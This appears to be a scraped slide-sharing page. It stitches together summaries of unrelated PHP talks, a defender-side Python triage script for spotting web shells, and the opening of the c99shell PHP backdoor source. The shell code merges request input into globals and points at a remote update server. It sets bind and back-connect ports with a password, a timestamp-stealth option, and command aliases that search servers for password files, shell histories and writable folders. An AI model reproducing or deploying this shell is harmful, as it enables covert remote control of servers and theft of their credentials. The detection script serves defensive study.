This document contains PHP code for a backdoor shell. It defines configuration variables like login credentials, directories, command aliases, and other settings. It also handles authentication, sets up sessions and cookies, and has code to update the backdoor. The goal is to provide a remote access shell that can execute commands, browse files, and perform other operations on the compromised server.
This document contains PHP code for a backdoor shell. It defines various configuration settings like directories, login credentials, command aliases, and other functionality. The code authenticates the user, handles requests, and provides a basic interface for accessing the system.
This document contains the configuration and settings for a PHP web shell. It defines variables for authentication, file types, commands, colors, and other options. It also contains code to check the request, merge parameters, and start the shell session.
This document contains the configuration and code for a PHP web shell. It sets various configuration options like the shell version, directories, file types, commands, and colors. It also checks for authentication if a login is set, sets PHP settings, merges request variables, and includes code to bypass safe mode restrictions. The code is for a backdoored web shell that provides access to the server's file system and allows execution of commands.
This document contains the configuration and initialization code for a PHP web shell called c99shell. It sets variables for login credentials, directories, file types, aliases and other settings. It also includes code to handle cookies and sessions for the shell interface.
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
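A defender-side triage sketch for the behaviours these summaries describe, keyed on identifiers that appear in the source listing on this page (the request-to-globals merge, the `c999sh_*` names, `$filestealth`, `$host_allow`). It is an added example, not part of the original upload; the weights, threshold, function names and both sample inputs are assumptions constructed for illustration.

```python
import re

# (name, weight, pattern). The names and patterns come from the listing on this
# page; the weights and THRESHOLD are assumptions chosen for this example.
INDICATORS = [
    ("request_to_globals", 3,   # every request parameter becomes a global
     r"foreach\s*\(\s*\$_REQUEST\s+as\s+\$(\w+)\s*=>\s*\$(\w+)\s*\)"
     r"[\s{]*if\s*\(\s*!\s*isset\s*\(\s*\$\$\1\s*\)\s*\)"
     r"[\s{]*\$\$\1\s*=\s*\$\2\b"),
    ("c999sh_identifier", 3, r"c999sh_(?:surl|updateurl|sourcesurl)"),
    ("self_update_flag", 2, r"\$updatenow\s*="),
    ("timestamp_stealth", 2, r"\$filestealth\s*="),
    ("exec_by_extension", 2, r"\$exeftypes\s*=\s*array"),
    ("host_allow_mask", 1, r"\$host_allow\s*=\s*array"),
    ("ignore_user_abort", 1, r"@ignore_user_abort\s*\(\s*TRUE\s*\)"),
]
THRESHOLD = 5


def strip_php_comments(src: str) -> str:
    """Drop //, # and /* */ comments but keep string literals intact.

    Keeping strings matters here: cookie names and "http://" URLs live in
    strings, and a naive '//' strip would cut them. Heredocs, '?>' ending a
    line comment and PHP 8 '#[' attributes are not handled (simplification).
    """
    out, i, n, quote = [], 0, len(src), None
    while i < n:
        ch = src[i]
        if quote:                              # inside '...' or "..."
            out.append(ch)
            if ch == "\\" and i + 1 < n:       # keep the escaped character
                out.append(src[i + 1])
                i += 2
                continue
            if ch == quote:
                quote = None
            i += 1
        elif ch in "'\"":
            quote = ch
            out.append(ch)
            i += 1
        elif src.startswith("//", i) or ch == "#":
            j = src.find("\n", i)              # line comment: skip to EOL
            i = n if j == -1 else j
        elif src.startswith("/*", i):
            j = src.find("*/", i + 2)          # block comment
            i = n if j == -1 else j + 2
            out.append(" ")
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def triage(src: str) -> dict:
    """Score one PHP source text; indicators seen only in comments do not count."""
    code = strip_php_comments(src)
    hits = [(name, w) for name, w, pat in INDICATORS if re.search(pat, code, re.I)]
    score = sum(w for _, w in hits)
    return {"score": score,
            "hits": [name for name, _ in hits],
            "suspicious": score >= THRESHOLD}


# Constructed sample: a few configuration lines as they appear in the listing.
SAMPLE_SHELL_FRAGMENT = r'''<?php
@ignore_user_abort(TRUE);
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$host_allow = array("*");
$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
$filestealth = TRUE;
'''

# Constructed sample: benign code that only mentions the indicators in comments.
SAMPLE_BENIGN = r'''<?php
// Incident note: the shell set a cookie named c999sh_surl and used
// foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$host_allow = array("10.0.0.*");
foreach ($_REQUEST as $k => $v) { $clean[$k] = trim($v); }
'''

if __name__ == "__main__":
    for label, text in (("shell fragment", SAMPLE_SHELL_FRAGMENT),
                        ("benign", SAMPLE_BENIGN)):
        print(label, triage(text))
```

A score at or above the threshold is a reason to pull the file for review, not a verdict; renamed variables or encoded copies will not match these literal patterns.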
Teaching Your Machine To Find Fraudsters - Ian Barber
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Debugging: Rules And Tools - PHPTek 11 Version - Ian Barber
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
This document provides an overview of 0MQ and examples of how to use it with PHP. It introduces 0MQ patterns like request/response, pub/sub, queue, and pipeline. Code snippets in PHP demonstrate implementing these patterns using 0MQ sockets. Additional resources for learning more about 0MQ and using it with PHP are provided at the end.
This document provides an overview of the Drush command line tool for Drupal, including the most commonly used Drush commands, installation instructions for Windows and Unix-like systems, configuration of aliases for sites, code and database synchronization, and development features like Drush make. It also demonstrates how to extend Drush by creating custom commands.
Using Mikko Koppanen's PHP ZMQ extension we will look at how you can easily distribute work to background processes, provide flexible service brokering for your next service oriented architecture, and manage caches efficiently and easily with just PHP and the ZeroMQ libraries. Whether the problem is asynchronous communication, message distribution, process management or just about anything, ZeroMQ can help you build an architecture that is more resilient, more scalable and more flexible, without introducing unnecessary overhead or requiring a heavyweight queue manager node.
The Browser Environment - A Systems Programmer's Perspective [sinatra edition] - Eleanor McHugh
The document discusses using Sinatra and Ruby to build web applications that utilize asynchronous JavaScript and XMLHttpRequest (AJAX) techniques. It demonstrates how to make HTTP requests to a Sinatra backend from JavaScript using XMLHttpRequest, Fetch API promises, and DOM manipulation. Various timing functions like setInterval and setTimeout are also explored. The document contains sample code for building a basic Sinatra API and incrementally enhancing the frontend JavaScript code to retrieve and display responses asynchronously.
Designing Operation Oriented Web Applications / YAPC::Asia Tokyo 2011 - Masahiro Nagano
The document describes using Log::Minimal to log messages with timestamps, severity levels, and stack traces. Log::Minimal provides functions like debugf(), infof(), warnf() that log messages, and configuration options like AUTODUMP and PRINT to customize the output format. It can be used to log messages from multi-threaded or distributed applications.
Talk given at the Open World Forum, 5 October 2013.
How to build a key-value NoSQL database in under an hour, based on the Nanomsg and LightningDB libraries.
Learn a little more about Perl 6, a modern, powerful and robust programming language that will let you write code in an agile and efficient way.
This document provides an overview of 0MQ (also known as ZeroMQ), a messaging library that enables various messaging patterns like request/reply, publish/subscribe, and queueing. It includes code examples in multiple languages like Erlang, Python, and PHP demonstrating how to implement common 0MQ patterns. Links are also provided for additional 0MQ resources.
PHP 7.1 contains new exciting features and improvements that can facilitate the life of many PHP developers. During the talk I will show some of these new features like nullable types, catching of multiple exceptions, the curl HTTP/2 server push support, void return types, Class constant visibility, authenticated encryption in OpenSSL with GCM and CCM modes, and more.
As presented at Confoo 2013.
More than some arcane NoSQL tool, Redis is a simple but powerful swiss army knife you can begin using today.
This talk introduces the audience to Redis and focuses on using it to cleanly solve common problems. Along the way, we'll see how Redis can be used as an alternative to several common PHP tools.
This document describes MyShell, an interactive PHP script that allows execution of commands on a server. It includes configuration options like authentication, allowed directories, error handling and output formatting. The script generates an HTML interface with a text area to view command output. Users can navigate directories, enter commands and view results within permissions set by the administrator.
From mysql to MongoDB (MongoDB2011 Beijing Meetup) - Night Sailer
The document summarizes differences between MySQL and MongoDB data types and operations. MongoDB uses BSON for data types rather than separate numeric, text and blob types. It supports embedded documents and arrays. Unlike MySQL, MongoDB does not have tables or rows, but collections and documents. Operations like insert, update, find, sort and index are discussed as alternatives to SQL equivalents.
The Browser Environment - A Systems Programmer's Perspective - Eleanor McHugh
The document discusses asynchronous JavaScript and XML (AJAX) techniques for making asynchronous HTTP requests from the browser. It provides code examples using XMLHttpRequest and the newer Fetch API to make requests to server-side handlers written in Go. The code sets up a simple page that displays buttons for different asynchronous actions, and uses JavaScript functions to make requests on button click, printing the responses to a log on the page. This demonstrates asynchronous interactivity between the browser and server.
This document contains PHP code for a web shell that provides a backdoor access to a compromised server. It defines variables for authentication, colors, and default actions. It also contains functions for handling authentication, printing headers/footers, and executing commands via the aliases array. The aliases array defines commands to run on both Windows and Linux servers, including commands to find/locate files and directories.
ZeroMQ Is The Answer: PHP Tek 11 Version - Ian Barber
This document provides an overview of ZeroMQ (0MQ), an asynchronous messaging library. It discusses 0MQ concepts like request/response, publish/subscribe, and pipelines. It includes code examples in PHP and Python demonstrating how to implement these patterns using 0MQ sockets and messaging. Additional sections cover 0MQ transport types, installation, and integrating 0MQ with other systems like Mongrel2.
This document contains the configuration and code for a PHP backdoor shell. It sets various options like the shell version, directories, enabled functions, command aliases, and more. The code also checks for updates, handles file operations and sessions, and has logic to restrict access by IP, authentication, or other means.
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, allowed hosts, directories, file types, commands, colors and other options. It appears to be code for a backdoor shell that provides access to the system it is running on.
Can't Miss Features of PHP 5.3 and 5.4 - Jeff Carouth
If you're like me you remember the days of PHP3 and PHP4; you remember when PHP5 was released, and how it was touted to change your life. It's still changing and there are some features of PHP 5.3 and new ones coming with PHP 5.4 that will improve your code readability and reusability. Let's look at some touted features such as closures, namespaces, and traits, as well as some features being discussed for future releases.
A lot of people are using PHPUnit for testing their source code. While I was observing my team I recognized most of them are only using the standard assertions like 'assertEquals()' or 'assertTrue()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis. It shows you some nice features of PHPUnit and how to use them for your benefit.
Go beyond the documentation and explore some of what's possible if you stretch symfony to its limits. We will look at a number of aspects of symfony 1.4 and Doctrine 1.2 and tease out some powerful functionality you may not have expected to find, but will doubtless be able to use. Topics covered will include routing, forms, the config cache and record listeners. If you're comfortable in symfony and wondering what's next, this session is for you.
This document contains code snippets for connecting to and extracting information from various data sources and applications using PHP, including:
1. Connecting to Microsoft Word and extracting the subject text from a document.
2. Retrieving thumbnail images from Adobe Lightroom files.
3. Accessing elevation data from SRTM files by calculating file offsets.
4. Sending SNMP traps containing error information from a RADIUS monitoring script.
5. Connecting to an Avaya OSSIS system using telnet and extracting field data.
This document summarizes the history of PHP persistence from 1995 to present day. It begins with early file handling in PHP/FI in 1995 and the introduction of database support. It then discusses the evolution of code reusability through functions and classes. Professional abstraction layers like PEAR and later ORM frameworks provided more robust and standardized APIs. NoSQL databases and drivers were later incorporated, moving beyond relational databases. Current frameworks provide object document mapping for non-SQL databases like MongoDB.
This PHP script is a web shell that allows remote command execution on the server. It sets various PHP configuration options to disable security restrictions. It also checks for an authentication password and sets a cookie upon valid login. The main body defines functions for outputting headers, menus and executing commands via the shell.
The document discusses Augeas, an open source configuration editing tool that parses configuration files into a tree structure and allows editing them through a standardized API. Lenses provide parsers for common configuration files, and Augeas can be used from configuration management tools like Puppet to securely edit files. Native providers can also be written for Augeas to manage complex configuration files like sshd_config that use grouping.
Raphaël Pinson's talk on "Configuration surgery with Augeas" at PuppetCamp Geneva '12. Video at http://youtu.be/H0MJaIv4bgk
Learn more: www.puppetlabs.com
The document discusses using vfsStream to mock the filesystem in unit tests. vfsStream provides a virtual filesystem that uses PHP streams, allowing tests to manipulate files and directories without interacting with the real filesystem. It describes how to set up vfsStream, create and interact with virtual files and directories, and a vfsStream PHPUnit helper that simplifies its integration with PHPUnit tests.
The document provides tips and tricks for PHP development. It begins with an introduction and contact information for the author. It then lists and describes several tips, including using the ternary operator for short conditional statements, different methods for listing directories, extracting parts of a filepath, checking for non-empty variables, and parsing URL parameters using parse_url and parse_str functions. The document encourages readers to share better solutions and includes additional resources on the PHP manual.
The document summarizes the state of the Lithium framework. It discusses project and community stats including contributors and issues closed. It outlines progress on the roadmap including new features like encrypting and signing cookies, nesting routes, and error handling. Upcoming features mentioned are HTTP service classes, filtering and sorting collections, and schema and multibyte classes. Community plugins are highlighted and tips and tricks are provided before opening for Q&A.
This document summarizes Brian D Foy's presentation on "My Perl Bag of Tricks" given at YAPC::Brasil 2011. Some of the tricks discussed include eliminating special cases, using Perl to do more of the work, scaling code gracefully, parsing XML data efficiently, testing code with sample inputs/outputs, and handling errors gracefully. The presentation aims to show Perl techniques for writing cleaner, more robust code.
international PHP2011_Bastian Feder_The most unknown Parts of PHPUnit - smueller_sandsmedia
PHPUnit provides many features beyond just testing code including:
- Command line options like --testdox to generate styled reports and --filter to select specific tests.
- Annotations like @covers and @group to document and organize tests.
- Various assertion methods like assertContains(), assertType(), and assertSelectRegExp() to validate test conditions.
- Test listeners that get called at different test execution stages to add functionality.
- Ways to test exceptions like @expectedException and try/catch blocks.
- Mocking features to isolate tests from external dependencies using callbacks and return values.
A lot of people using PHPunit for testing their source code. While I was observing my team I recognized most of them are only using the standard assertions like 'assertEquals()' and are complaining about how hard it is to test the code even when the tests are written first. This talk is about all the stuff not used on a daily basis and it digs deep into uncommon features of PHPUnit.
Security Meetup, 22 October. "Reverse Engineering in Enterprise". Алексей Секрето... - Mail.ru Group
This document discusses exploiting PHP unserialization vulnerabilities. It begins by introducing the presenter and explaining what unserialization is and how it can be insecure if magic methods like __wakeup or __destruct are executed after unserialization. Potential vulnerabilities are demonstrated through examples. The document then discusses more complex chains that can be used to exploit unserialization, including examples from real-world projects like Kohana and exploiting serialized data stored in databases. It describes building a tool to automatically find chains in PHP code that could be exploited via unserialization and demonstrates its use on sample code. The document concludes by noting the challenges of automatically generating exploits due to the lack of static analysis in the tool.
Security Meetup, 22 October. "PHP Unserialize Exploiting". Павел Топорков. Лаб... - Mail.ru Group
This document discusses exploiting PHP unserialization vulnerabilities. It begins by introducing the presenter and explaining why unserialization is insecure, as magic methods like __destruct can be executed after unserialization. Potential exploits are demonstrated through examples, including using unserialization to execute system commands and perform SSRF attacks. The document also notes that many PHP frameworks and libraries contain classes that could enable chaining multiple exploits through unserialization. It then describes the presenter's tool for analyzing PHP code to find possible exploit chains for unserialization vulnerabilities.
This script is used to start and stop the Apache Tomcat application server. It checks environment variables and Java installation locations. It then executes the specified command, such as "start", "stop", "debug" passing in JVM options and system properties. The script handles tasks like setting up the classpath, checking for required files, and running Java in the background for startup.
<?php
//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);}
else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
$surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server
$c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish a free shell and wish to
add a link to your site or any other information,
put your HTML here. */
$donated_act = array(""); //array ("act1","act2",...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or
%WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting: 0 - column number, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
array("config.php",1) // example
);
$safemode_diskettes = array("a"); // This variable is for disabling diskette errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c999"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
$cmdaliases = array(
array("-----------------------------------------------------------", "ls -la"),
array("find all suid files", "find / -type f -perm -04000 -ls"),
array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("find all sgid files", "find / -type f -perm -02000 -ls"),
array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("find config.inc.php files", "find / -type f -name config.inc.php"),
array("find config* files", "find / -type f -name \"config*\""),
array("find config* files in current dir", "find . -type f -name \"config*\""),
array("find all writable folders and files", "find / -perm -2 -ls"),
array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("find all service.pwd files", "find / -type f -name service.pwd"),
array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("find all .htpasswd files", "find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("find all .bash_history files", "find / -type f -name .bash_history"),
array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system", "lsattr -va"),
array("show opened ports", "netstat -an | grep -i listen")
);
}
else
{
$cmdaliases = array(
array("-----------------------------------------------------------", "dir"),
array("show opened ports", "netstat -an")
);
}